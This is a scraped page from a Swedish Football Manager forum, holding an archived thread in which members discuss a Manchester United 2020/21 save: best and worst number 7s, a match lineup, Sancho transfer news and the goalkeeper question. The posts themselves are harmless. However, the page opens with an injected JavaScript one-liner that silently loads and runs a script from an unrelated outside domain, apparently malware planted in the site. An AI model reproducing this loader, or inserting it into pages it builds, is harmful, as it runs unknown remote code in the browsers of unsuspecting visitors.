;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Manchester United 2020/21 – Sida 2 – Arkiverat – FMSweden Forum
Meny Stäng

Manchester United 2...
 
Share:
Notifications
Clear all

Manchester United 2020/21

26 Inlägg
15 Users
22 Reactions
1,124 Visningar
JS7
 JS7
(@js7)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 25
 
Postad av: @ragnar

Jag vill ha två listor på spelare som lirat i nummer 7. Första listan ska vara de bästa, andra listan ska vara de sämsta. Topp 3 på båda.

Bästa

1. C. Ronaldo

2. E. Cantona

3. D. Beckham

 

Sämsta

1. Di Maria

2. Sanchez

3. Depay


   
SvaraCitera
The Gustine
(@the-gustine)
Trusted Member
Blev medlem: 4 år sedan
Inlägg: 93
 

Matchdag mot FC Köpenhamn i EL där en semi mot Wolves eller Sevilla ligger i potten. OGS väljer att mönstra en tämligen stark elva.

4-2-3-1: Romero; Wan-Bissaka, Bailly, Maguire, Williams; Pogba, Fred; Greenwood, Fernandes, Rashford; Martial

 

News:

- Intern deadline för Dortmund gällande försäljningen av Sancho. United och Dortmund har inte kommit överens om övergångssumman och Sancho har således åkt med laget till träningslägret i Schweiz.

- Målvaktsfrågan för 20/21 är fortfarande öppen. Enligt OGS kommer klubben ta beslut inom kort hur man väljer att göra. (Man vill vänta till efter EL är färdigspelat om du frågar mig, då Romeo än så länge är första valet där.) Klart är att man inte kommer kunna ha De Gea, Henderson och Romeo i truppen.

- Frustrationen mot Glazers och Woodward har återigen blåssat upp rejält bland fansen efter en lång stund av tystnad då resultaten gått ledningens väg.Anledningen är givetvis att man inte kunna lösa en deal gällande Sancho.

 

thegustine @Twitter.


   
SvaraCitera
Q
 Q
(@q)
Estimable Member
Blev medlem: 4 år sedan
Inlägg: 134
 

Vad är din åsikt i målvaktsfrågan?

VI HAR ALLTID DRÖMT OM ATT SPELA I BLÅRANDIGT - SPELA SOM I VÅRA DRÖMMAR!


   
SvaraCitera
The Gustine
(@the-gustine)
Trusted Member
Blev medlem: 4 år sedan
Inlägg: 93
 
Postad av: @ragnar

Vad är din åsikt i målvaktsfrågan?

Skulle det vara kniven mot strupen och att det stod mellan De Gea och Henderson hade jag valt Henderson. De Gea har senaste tiden varit en ok skottstoppare men inte mer. Hade vi pratat om den De Gea som dominerade i buren och radade upp omöjliga räddningar säsongen 2017-2018 hade det varit en no brainer och valet hade istället fallit på De Gea. 

Dock tror jag man kommer erbjuda Henderson ett nytt kontrakt med en rejäl löneökning och ett löfte om att han inom 3 säsonger kommer vara nr.1. Efter det kommer en utlåning ske över kommande säsong för att få speltid. 

Grant och Romero har ett år kvar på kontraktet vilket gör att målvaktsfrågan till säsong 21/22 kommer se annorlunda ut och då kommer vi nog få se Henderson/De Gea istället alternativt att De Gea lämnar och en ny nummer 2 plockas in. 

thegustine @Twitter.


   
Q reacted
SvaraCitera
Onkel Fester
(@onkel-fester)
Trusted Member
Blev medlem: 4 år sedan
Inlägg: 67
 

Är verkligen Di Maria den sämsta spelaren som burit nummer 7? Nog med att han hade en rutten attityd och inte motsvarade förväntningarna sett till transfersumma, men han gjorde ändå 4 mål och 12 assist på 22,5 matchers speltid. Det i ett dysfunktionellt Man Utd. Trots att han egentligen bara spelade halva säsongen så var han ändå poängstarkast i laget efter Wayne Rooney. 


   
SvaraCitera
Micke
(@micke)
Reputable Member Admin
Blev medlem: 4 år sedan
Inlägg: 239
 

Skönt att få en ordentlig islossning i går efter lite frågetecken kring offensiven de senaste matcherna. Nu är det uppåt igen, som Nacka Skoglund skulle ha sagt!

"I have never played for a draw in my life." - Sir Alex Ferguson


   
SvaraCitera
Sida 2 / 2
Share: